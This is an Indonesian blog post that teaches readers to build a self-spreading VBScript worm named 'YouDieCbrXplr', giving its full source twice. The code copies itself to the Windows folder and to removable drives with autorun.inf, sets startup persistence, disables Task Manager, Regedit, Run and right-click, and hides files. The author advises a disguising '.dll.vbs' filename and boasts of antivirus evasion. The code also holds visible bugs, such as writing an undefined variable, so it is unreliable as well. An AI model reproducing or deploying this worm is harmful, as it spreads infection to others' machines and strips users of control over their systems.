Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama "YouDieCbrXplr.VBS". Sekarang buka Notepad-nya. Copy kode berikut :
'//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus-//
on error resume next
'//-Dim kata-kata berikut ini-//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,YouDieCbrXplr,nt,check,sd
'//-Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information-//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe YouDieXplr.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'//-Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- YouDieXplr.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- YouDieXplr.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- YouDieXplr.dll.vbs ")
tf.attributes = 39
'//-Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok-//
'Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
'//-Cek Drive-//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\-//
set tf=fs.getfile(flashdrive.path &"\YouDieXplr.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\YouDieXplr.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\YouDieXplr.dll.vbs ")
tf.attributes = 39
'//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)-//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
'//-Manipulasi Registry-//
set YouDieCbrXplr = createobject("WScript.Shell")
'//-Manip - Ubah Title Internet Explorer menjadi THE YOUDIECBRXPLR v.s. ZAY-//
YouDieCbrXplr.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE YOUDIECBRXPLR v.s. ZAY "
'//-Manip - Set agar file hidden tidak ditampilkan di Explorer-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0″, "REG_DWORD"
'//-Manip - Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1″, "REG_DWORD"
'//-Manip - Disable klik kanan-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1″, "REG_DWORD"
'//-Manip - Munculkan Pesan Setiap Windows Startup-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm YouDieCbrXplr. Variant from Rangga-Zay, don't panic all data are safe."
'//-Manip - Aktif setiap Windows Startup-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- YouDieXplr.dll.vbs "
//-Manip - Ubah RegisteredOwner dan Organization-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","YouDieCbrXplr"
'//-Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan-//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih "All Files (*.*). Simpan dengan nama : YouDieXplr.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he...Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay kemudian saya kembangkan. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
'//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus-//
on error resume next
'//-Dim kata-kata berikut ini-//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,YouDieCbrXplr,nt,check,sd
'//-Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information-//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe YouDieXplr.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'//-Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- YouDieXplr.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- YouDieXplr.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- YouDieXplr.dll.vbs ")
tf.attributes = 39
'//-Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok-//
'Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
'//-Cek Drive-//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\-//
set tf=fs.getfile(flashdrive.path &"\YouDieXplr.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\YouDieXplr.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\YouDieXplr.dll.vbs ")
tf.attributes = 39
'//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)-//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
'//-Manipulasi Registry-//
set YouDieCbrXplr = createobject("WScript.Shell")
'//-Manip - Ubah Title Internet Explorer menjadi THE YOUDIECBRXPLR v.s. ZAY-//
YouDieCbrXplr.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE YOUDIECBRXPLR v.s. ZAY "
'//-Manip - Set agar file hidden tidak ditampilkan di Explorer-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0″, "REG_DWORD"
'//-Manip - Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1″, "REG_DWORD"
'//-Manip - Disable klik kanan-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1″, "REG_DWORD"
'//-Manip - Munculkan Pesan Setiap Windows Startup-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm YouDieCbrXplr. Variant from Rangga-Zay, don't panic all data are safe."
'//-Manip - Aktif setiap Windows Startup-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- YouDieXplr.dll.vbs "
//-Manip - Ubah RegisteredOwner dan Organization-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","YouDieCbrXplr"
'//-Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan-//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih "All Files (*.*). Simpan dengan nama : YouDieXplr.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he...Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay kemudian saya kembangkan. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
No comments:
Post a Comment